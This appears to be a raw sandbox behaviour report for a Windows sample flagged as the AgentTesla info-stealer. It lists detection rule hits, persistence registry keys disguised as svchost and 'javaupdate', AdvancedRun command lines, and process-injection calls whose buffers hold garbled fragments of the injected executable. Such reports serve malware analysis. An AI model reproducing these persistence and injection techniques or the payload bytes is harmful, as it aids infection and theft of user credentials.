oldfilepath_r: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\jzlgq1us.newcfg
newfilepath: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\user.config
oldfilepath: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\jzlgq1us.newcfg
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Run a KeyLogger rule KeyLogger
description Win.Trojan.agentTesla rule Win_Trojan_agentTesla_Zero
description Google Chrome User Data Check rule Chrome_User_Data_Check_Zero
description email clients info stealer rule infoStealer_emailClients_Zero
description browser info stealer rule infoStealer_browser_Zero
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Run a KeyLogger rule KeyLogger
description Win.Trojan.agentTesla rule Win_Trojan_agentTesla_Zero
description Google Chrome User Data Check rule Chrome_User_Data_Check_Zero
description email clients info stealer rule infoStealer_emailClients_Zero
description browser info stealer rule infoStealer_browser_Zero
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Run a KeyLogger rule KeyLogger
description Win.Trojan.agentTesla rule Win_Trojan_agentTesla_Zero
description Google Chrome User Data Check rule Chrome_User_Data_Check_Zero
description email clients info stealer rule infoStealer_emailClients_Zero
description browser info stealer rule infoStealer_browser_Zero
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
host 172.217.25.14
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000007ec
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5936
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000774
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8532
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000077c
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4 reg_value C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4 reg_value C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4 reg_value C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\javaupdate reg_value C:\Users\test22\AppData\Roaming\Install\Host.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{84R20A67-Q1HP-57Q4-5F1G-A71A01846283}\StubPath reg_value "C:\Users\test22\AppData\Roaming\Install\Host.exe"
file C:\Users\test22\AppData\Roaming\Install\Host.exe
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer: zR| ˆ(Peÿÿ9A†A ƒC q AÃAÆHdeÿÿ,C h`|eÿÿ,C hx”eÿÿFC0BÌeÿÿFC0B¨fÿÿ>C0zzR| ˆ fÿÿaAƒC0| AÃA @`fÿÿaAƒC0| AÃA d¬fÿÿaAƒC0| AÃA ˆøfÿÿICZ E S E JzR| ˆÌÿÿzR| ˆàfÿÿ+C gzR| ˆ àfÿÿKD†A ƒ}ÃEÆ0@ gÿÿœA‡A †CƒH ‹Aà AÆAÇ,txgÿÿ\A†A ƒN ÃAÆA HÃAÆT¤¨gÿÿ…A…A ‡A†CƒE@M AÃAÆ AÇAÅA W EÃAÆ AÇAÅE 8üàgÿÿœA…A ‡C†CƒCPŒAÃAÆ AÇAÅ<8DhÿÿyA…A ‡F†AƒC@hAÃAÆ AÇAÅ4x„iÿÿþA‡A †AƒC Ø Aà AÆAÇA °Ljÿÿ‚AƒC x AÃA 4Ô¸jÿÿŠA‡A †AƒC0a Aà AÆAÇA 4 kÿÿŠA‡A †AƒC0a Aà AÆAÇA 4DhkÿÿœA‡A †AƒC0p Aà AÆAÇA zR| ˆ<¸kÿÿÑA…A ‡A†AƒC`0 CÃAÆ AÇAÅA zR| ˆ<@nÿÿ¸A…C ‡A†AƒC@ˆ AÃAÆ AÇAÅA <\ÀoÿÿqA…A ‡A†AƒCpt AÃAÆ AÇAÅA zR| ˆ<hxÿÿ`A…A ‡A†AƒC@2 AÃAÆ AÇAÅA zR| ˆ<pyÿÿ?A…B F‡†ƒÚ ÃAÆAÇAÅ A µ ÃAÆAÇAÅ A
base_address: 0x0042a000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer: r:k_( ( ( ( 
base_address: 0x00432000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer: €0€ HXPhäh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsWkLW Rjlr(CompanyNameJeq8FileDescriptionFtH TRx0FileVersion3.6.3.7: InternalNameYjFX Hxl.exez+LegalCopyrightCopyright 2020 © YPO. All rights reserved.2LegalTrademarksVkaDB OriginalFilenameYjFX Hxl.exe2 ProductNameYjFX Hxl4ProductVersion3.4.1.48Assembly Version3.4.1.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00435000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer: X 00 0+010;0E0¦0Ä0Ë0å0ñ0122K3W3¢3944y5T6?8¿8Ò9Ú9Z:;!=+=6=Ü=æ=ñ=­>í>!?+?6? `Î14<4{4’4¢4´4Æ4Ý4è4j55‘5£5µ5Ì5×5c6z6Š6œ6®6Å6Ð6R7i7y7‹77´7¿7p9:;:q:‡:—:§:Ç:å: ;ª<è?÷?0800+0¸0Ç0Ö0í0ÿ0¦1²1Æ1Ý1ï1!2,2M2\23333.393@3G3\3d3k3r3„33–33³3»3Â3É3Û3æ3í3ô3 444 424=4D4K4R5Y5o5y55–5ª5´5Ì5Ó5ç5î5ÿ566&6E6L6_6i66†6˜6¢6±6¸6Ð6Ý6ç6ö677+767W7i7©7»7Ñ7ã7!888N8f8¡8«8Â8Ø8é9ð9::!:(:@:L:h:o:Š:”:¤:«:µ:¼:å:ì:ý:;;%;9;F;R;Y;s;};„;;Ÿ;­;Õ;Ü;÷; <$<.<L<`<x<†<¢<´<Ã<Ö<ì<= ??I?]?d?Í?î?@$0,0N0»1Ø1ù1 232¸24(4L4]44š4Ë4A5G5T5¯5Ê5Ñ5Û5â5é5ñ5ø5 666,656?6F6M6Z6a6l6u6|6‰666¦6­6º6Á6Ì6Õ6Ü6é6ð677'7-747=7d7k7í7õ7ü7 888%8-848A8I8P8h8u88˜8¥8²8É8Õ8â8ø89(9/969U9j9:;:C:M:ò:;#;-;y;á;< <<<8<M<_<…<Ú<ö<1=H=‹=’=™=¥=¬=³=º=Ã=Ê=Ñ=Ø=å= >,>K>R>k>~>„>š>¦>«>±>K?T??˜?²?Ö?Ý?æ?ú?P r00†0‹0—0ž0¥0Y1h1w1í1 22+2;2H2T2e2t2ƒ2’2¡2°2¿2Î2Ý2ì2û2 3(3-3E3J3h3m33š3»3Þ3ã3³4º4×4é4 55!5(555=5I5P5a5i5q5x5˜5Ê5Õ5_<ü<Ì=>>F>K>X>Æ>ó>þ>?`?k?„?Œ?‘?ž?`P 000;0¸0Ñ0Ù0í12&202C2H2M2[2€2‡2£2½2 3Í4c68&8P8‘9#:Ò:Ç<==5=¼=>¿>£?¾?p, 0À455?5e5¬5N6©78‚:Š;Ã;à;ø;<ú<U=€„„0¦0ô2W3m3}3V5a6v6‰6“6À67~7ž7ü7S8Ú8æ899B9™9ý9::¾:Ä:Ú:á:ï:X;^;Ÿ;¥;»;Â;Î;Ú;!<^<â<è<þ<==‚=ˆ=É=Ï=å=ì=8>¶>Ã>ê>÷>?4?’?°?Ì?á?Ä 0$0<0T0l0„0œ0´0Ì0ä0ü01,1a1l11¤1©1³1Ý120262A2Ž2 3313D33—3Ë3Ó3è344;4k4s4—4Ÿ4ï4„66Ò6ß6ÿ67S7`7†7¢7¶7Â7Þ7æ788|89F9Ý9ˆ:£:;¯;<<Q<i<†<™<©<¸<Ó<ï<==='=7=[=¹=Á=‚>4?a?•?º?×?à?é?ò?û? |0 000(010:0C0L0+151­1 292©2¶2Å2÷263…3½3Ð3Ü3ö3þ34444i4‰4>5Š5’546’6 77g7o7_8s8‹8Â8Ê8Ù89V9z9´9»9Ð9å9:u:”:®:Î:K;°0Ì:¯;õ;<ž<ä<=§=Ë=>;>î>?&?E?­?Â?å?ÿ?Àx0¦0È0U1{1Ž1×1ã1ø12.2w2ƒ2˜2»2Î23#3M33²3Í3ø3#4N4y4¤4Ï4ú4#5J5s5ž5õ5 6˜8:9:;:¨:Þ:F<= =R=^=…=ø=G>[>‰>Î>?T?|??Ðhä0A1€1´1ç1$2T2‡2Ä2ô2'3d3”3Ç3484k4ë4ý5Z6™6Í67=7m7 7Ý7 8@8}8­8à89Q9„9:>;3<<Õ<!=>>u>?1?^?Û?ü?à<ï0º2]3ý5¥6ð6797x7¤7î78S8w8«8Ì8è89"9<9Z97<o>9?A?N?ð@ò1{33£3Í6ª7ñ9\:|:‹;Ÿ;³;†=’=ð=>>,>‡>“>ñ>? ?-?ˆ?”?ò?h0!0.0‰0•0ó01"1/1Ž1›1ê1þ12&2…2’2á2õ233x3„3 4ƒ::±:½:C;’;<=™=¥=ª=¯=´=¹=À=Ñ=î=û= >>%>9>>>U>,?4!6H7Æ7U8Ô8¥9à9‡:—;™<è<}= ?l?€?§?³? y0Ð1C2M2b2ü2›8"=0r<=¨=>Ô>à>@\…0à0ì0c1x1›1Å1ß1í122„3È34!4W4›4£4Ì4 5œ5À5á5÷56Y6Ü6ô6s7Â7q89¶:+;„;Ñ;2<—=Ñ=û=Ä?P A2 2`D}0Ð0]1d1­1´1ö13¥3¬3×3Þ34*4ƒ4Š4š4¡45„5‹5Æ6Í679>96<C<P<í<ô<pª=»=Ì=ƒ>>\?e?€p0¹778B8h8#98;æ;62F2v4}4 4Î3Õ34 474»4Â499þ;<m<s<€<*=<=W=B>U>b>®>µ>° ¨1¯1¤45m5M6Z6’8š8:µ:À G?k?Ð(1X1µ1¡2®2»2ž3ª3Ý3X7_79s=O>V>àY0ê4ñ4¦:¢;ø;)=H=ð(A3H3 4m5k7b9°<¾?Æ?Î?Ö?Þ?æ?î?ö?þ?¤0000&0.060>0F0N0V0^0f0n0v0~0†0Ž0–0ž0¦0®0¶0¾0Æ0Î0Ö0Þ0æ0î0ö0þ01111&1.161>1F1N1V1^1f1n1v1~1†1Ž1–1ž1¦1®1¶1¾1Æ1Î1Ö1Þ1æ1î1ö1þ12222&2.262>2F2N2V2^2f2n2v2~2†2Ž2–2ž2¦2®2¶2¾2Æ2Î2Ö2Þ2æ2î2ö2þ23333&3.363>3F3N3V3^3f3n3v3~3†3Ž3–3ž3¦3®3¶3¾3Æ3Î3Ö3Þ3æ3î3ö3þ34444&4.464>4F4N4V4^4f4n4v4~4†4Ž4–4ž4¦4®4¶4¾4Æ4Î4Ö4Þ4æ4î4ö4þ45555&5.565>5F5N5V5^5š56o6¿6 7>7E7K7y7®7µ7»7é78%8+8Ñ8 >>>/>6><>‡>Ç>Î>Ô>*?W?^?d?ö?ý?H0<1C1I1Ë2Ò2Ø254<4B4’4™4Ÿ4u8|8‚8ö:ý:;>;>E>W>a>°>¾>Ë>Ò>ú>?? 11161=1C1P4 ;¤;¨;¬;°;´;¸;¼;À;Ä;È;Ì;Ð;Ô;Ø;Ü;à;ä;è;ì;ð;ô;ø;ü;<<< <<<<< <$<(<,<0<4<8<<<@<D<H<L<`<d<h<l<p<t<x<|<€<== ===== =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=€=„=ˆ=Œ==”=˜=œ= =¤=¨=¬=°=´=¸=¼=À=Ä=È=Ì=Ð=Ô=Ø=Ü=à=ä=è=ì=ð=ô=ø=ü=>>> >>>>> >$>(>,>0>4>8><>@>D>H>L>À?Ä?È?Ì?Ð?Ô?Ø?Ü?à?ä?è?ì?ð?p°L0P0T0X0\0`0d0h0l0p0t0¤6¨6¬6°6´6¸6¼6À6Ä6È6Ì6Ð6 77777 7::: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:€:„:ˆ:Œ::”:˜:œ: :¤:¨:¬:°:´:¸:¼:À:Ä:È:Ì:Ð:Ô:Ø:Ü:à:ä:è:€0 000$0,040<0D0L0
base_address: 0x00436000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

 buffer: zR| ˆ(Peÿÿ9A†A ƒC q AÃAÆHdeÿÿ,C h`|eÿÿ,C hx”eÿÿFC0BÌeÿÿFC0B¨fÿÿ>C0zzR| ˆ fÿÿaAƒC0| AÃA @`fÿÿaAƒC0| AÃA d¬fÿÿaAƒC0| AÃA ˆøfÿÿICZ E S E JzR| ˆÌÿÿzR| ˆàfÿÿ+C gzR| ˆ àfÿÿKD†A ƒ}ÃEÆ0@ gÿÿœA‡A †CƒH ‹Aà AÆAÇ,txgÿÿ\A†A ƒN ÃAÆA HÃAÆT¤¨gÿÿ…A…A ‡A†CƒE@M AÃAÆ AÇAÅA W EÃAÆ AÇAÅE 8üàgÿÿœA…A ‡C†CƒCPŒAÃAÆ AÇAÅ<8DhÿÿyA…A ‡F†AƒC@hAÃAÆ AÇAÅ4x„iÿÿþA‡A †AƒC Ø Aà AÆAÇA °Ljÿÿ‚AƒC x AÃA 4Ô¸jÿÿŠA‡A †AƒC0a Aà AÆAÇA 4 kÿÿŠA‡A †AƒC0a Aà AÆAÇA 4DhkÿÿœA‡A †AƒC0p Aà AÆAÇA zR| ˆ<¸kÿÿÑA…A ‡A†AƒC`0 CÃAÆ AÇAÅA zR| ˆ<@nÿÿ¸A…C ‡A†AƒC@ˆ AÃAÆ AÇAÅA <\ÀoÿÿqA…A ‡A†AƒCpt AÃAÆ AÇAÅA zR| ˆ<hxÿÿ`A…A ‡A†AƒC@2 AÃAÆ AÇAÅA zR| ˆ<pyÿÿ?A…B F‡†ƒÚ ÃAÆAÇAÅ A µ ÃAÆAÇAÅ A
base_address: 0x0042a000
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

 buffer: r:k_( ( ( ( 
base_address: 0x00432000
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

 buffer: €0€ HXPhäh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsWkLW Rjlr(CompanyNameJeq8FileDescriptionFtH TRx0FileVersion3.6.3.7: InternalNameYjFX Hxl.exez+LegalCopyrightCopyright 2020 © YPO. All rights reserved.2LegalTrademarksVkaDB OriginalFilenameYjFX Hxl.exe2 ProductNameYjFX Hxl4ProductVersion3.4.1.48Assembly Version3.4.1.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00435000
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

 buffer: X 00 0+010;0E0¦0Ä0Ë0å0ñ0122K3W3¢3944y5T6?8¿8Ò9Ú9Z:;!=+=6=Ü=æ=ñ=­>í>!?+?6? `Î14<4{4’4¢4´4Æ4Ý4è4j55‘5£5µ5Ì5×5c6z6Š6œ6®6Å6Ð6R7i7y7‹77´7¿7p9:;:q:‡:—:§:Ç:å: ;ª<è?÷?0800+0¸0Ç0Ö0í0ÿ0¦1²1Æ1Ý1ï1!2,2M2\23333.393@3G3\3d3k3r3„33–33³3»3Â3É3Û3æ3í3ô3 444 424=4D4K4R5Y5o5y55–5ª5´5Ì5Ó5ç5î5ÿ566&6E6L6_6i66†6˜6¢6±6¸6Ð6Ý6ç6ö677+767W7i7©7»7Ñ7ã7!888N8f8¡8«8Â8Ø8é9ð9::!:(:@:L:h:o:Š:”:¤:«:µ:¼:å:ì:ý:;;%;9;F;R;Y;s;};„;;Ÿ;­;Õ;Ü;÷; <$<.<L<`<x<†<¢<´<Ã<Ö<ì<= ??I?]?d?Í?î?@$0,0N0»1Ø1ù1 232¸24(4L4]44š4Ë4A5G5T5¯5Ê5Ñ5Û5â5é5ñ5ø5 666,656?6F6M6Z6a6l6u6|6‰666¦6­6º6Á6Ì6Õ6Ü6é6ð677'7-747=7d7k7í7õ7ü7 888%8-848A8I8P8h8u88˜8¥8²8É8Õ8â8ø89(9/969U9j9:;:C:M:ò:;#;-;y;á;< <<<8<M<_<…<Ú<ö<1=H=‹=’=™=¥=¬=³=º=Ã=Ê=Ñ=Ø=å= >,>K>R>k>~>„>š>¦>«>±>K?T??˜?²?Ö?Ý?æ?ú?P r00†0‹0—0ž0¥0Y1h1w1í1 22+2;2H2T2e2t2ƒ2’2¡2°2¿2Î2Ý2ì2û2 3(3-3E3J3h3m33š3»3Þ3ã3³4º4×4é4 55!5(555=5I5P5a5i5q5x5˜5Ê5Õ5_<ü<Ì=>>F>K>X>Æ>ó>þ>?`?k?„?Œ?‘?ž?`P 000;0¸0Ñ0Ù0í12&202C2H2M2[2€2‡2£2½2 3Í4c68&8P8‘9#:Ò:Ç<==5=¼=>¿>£?¾?p, 0À455?5e5¬5N6©78‚:Š;Ã;à;ø;<ú<U=€„„0¦0ô2W3m3}3V5a6v6‰6“6À67~7ž7ü7S8Ú8æ899B9™9ý9::¾:Ä:Ú:á:ï:X;^;Ÿ;¥;»;Â;Î;Ú;!<^<â<è<þ<==‚=ˆ=É=Ï=å=ì=8>¶>Ã>ê>÷>?4?’?°?Ì?á?Ä 0$0<0T0l0„0œ0´0Ì0ä0ü01,1a1l11¤1©1³1Ý120262A2Ž2 3313D33—3Ë3Ó3è344;4k4s4—4Ÿ4ï4„66Ò6ß6ÿ67S7`7†7¢7¶7Â7Þ7æ788|89F9Ý9ˆ:£:;¯;<<Q<i<†<™<©<¸<Ó<ï<==='=7=[=¹=Á=‚>4?a?•?º?×?à?é?ò?û? |0 000(010:0C0L0+151­1 292©2¶2Å2÷263…3½3Ð3Ü3ö3þ34444i4‰4>5Š5’546’6 77g7o7_8s8‹8Â8Ê8Ù89V9z9´9»9Ð9å9:u:”:®:Î:K;°0Ì:¯;õ;<ž<ä<=§=Ë=>;>î>?&?E?­?Â?å?ÿ?Àx0¦0È0U1{1Ž1×1ã1ø12.2w2ƒ2˜2»2Î23#3M33²3Í3ø3#4N4y4¤4Ï4ú4#5J5s5ž5õ5 6˜8:9:;:¨:Þ:F<= =R=^=…=ø=G>[>‰>Î>?T?|??Ðhä0A1€1´1ç1$2T2‡2Ä2ô2'3d3”3Ç3484k4ë4ý5Z6™6Í67=7m7 7Ý7 8@8}8­8à89Q9„9:>;3<<Õ<!=>>u>?1?^?Û?ü?à<ï0º2]3ý5¥6ð6797x7¤7î78S8w8«8Ì8è89"9<9Z97<o>9?A?N?ð@ò1{33£3Í6ª7ñ9\:|:‹;Ÿ;³;†=’=ð=>>,>‡>“>ñ>? ?-?ˆ?”?ò?h0!0.0‰0•0ó01"1/1Ž1›1ê1þ12&2…2’2á2õ233x3„3 4ƒ::±:½:C;’;<=™=¥=ª=¯=´=¹=À=Ñ=î=û= >>%>9>>>U>,?4!6H7Æ7U8Ô8¥9à9‡:—;™<è<}= ?l?€?§?³? y0Ð1C2M2b2ü2›8"=0r<=¨=>Ô>à>@\…0à0ì0c1x1›1Å1ß1í122„3È34!4W4›4£4Ì4 5œ5À5á5÷56Y6Ü6ô6s7Â7q89¶:+;„;Ñ;2<—=Ñ=û=Ä?P A2 2`D}0Ð0]1d1­1´1ö13¥3¬3×3Þ34*4ƒ4Š4š4¡45„5‹5Æ6Í679>96<C<P<í<ô<pª=»=Ì=ƒ>>\?e?€p0¹778B8h8#98;æ;62F2v4}4 4Î3Õ34 474»4Â499þ;<m<s<€<*=<=W=B>U>b>®>µ>° ¨1¯1¤45m5M6Z6’8š8:µ:À G?k?Ð(1X1µ1¡2®2»2ž3ª3Ý3X7_79s=O>V>àY0ê4ñ4¦:¢;ø;)=H=ð(A3H3 4m5k7b9°<¾?Æ?Î?Ö?Þ?æ?î?ö?þ?¤0000&0.060>0F0N0V0^0f0n0v0~0†0Ž0–0ž0¦0®0¶0¾0Æ0Î0Ö0Þ0æ0î0ö0þ01111&1.161>1F1N1V1^1f1n1v1~1†1Ž1–1ž1¦1®1¶1¾1Æ1Î1Ö1Þ1æ1î1ö1þ12222&2.262>2F2N2V2^2f2n2v2~2†2Ž2–2ž2¦2®2¶2¾2Æ2Î2Ö2Þ2æ2î2ö2þ23333&3.363>3F3N3V3^3f3n3v3~3†3Ž3–3ž3¦3®3¶3¾3Æ3Î3Ö3Þ3æ3î3ö3þ34444&4.464>4F4N4V4^4f4n4v4~4†4Ž4–4ž4¦4®4¶4¾4Æ4Î4Ö4Þ4æ4î4ö4þ45555&5.565>5F5N5V5^5š56o6¿6 7>7E7K7y7®7µ7»7é78%8+8Ñ8 >>>/>6><>‡>Ç>Î>Ô>*?W?^?d?ö?ý?H0<1C1I1Ë2Ò2Ø254<4B4’4™4Ÿ4u8|8‚8ö:ý:;>;>E>W>a>°>¾>Ë>Ò>ú>?? 11161=1C1P4 ;¤;¨;¬;°;´;¸;¼;À;Ä;È;Ì;Ð;Ô;Ø;Ü;à;ä;è;ì;ð;ô;ø;ü;<<< <<<<< <$<(<,<0<4<8<<<@<D<H<L<`<d<h<l<p<t<x<|<€<== ===== =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=€=„=ˆ=Œ==”=˜=œ= =¤=¨=¬=°=´=¸=¼=À=Ä=È=Ì=Ð=Ô=Ø=Ü=à=ä=è=ì=ð=ô=ø=ü=>>> >>>>> >$>(>,>0>4>8><>@>D>H>L>À?Ä?È?Ì?Ð?Ô?Ø?Ü?à?ä?è?ì?ð?p°L0P0T0X0\0`0d0h0l0p0t0¤6¨6¬6°6´6¸6¼6À6Ä6È6Ì6Ð6 77777 7::: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:€:„:ˆ:Œ::”:˜:œ: :¤:¨:¬:°:´:¸:¼:À:Ä:È:Ì:Ð:Ô:Ø:Ü:à:ä:è:€0 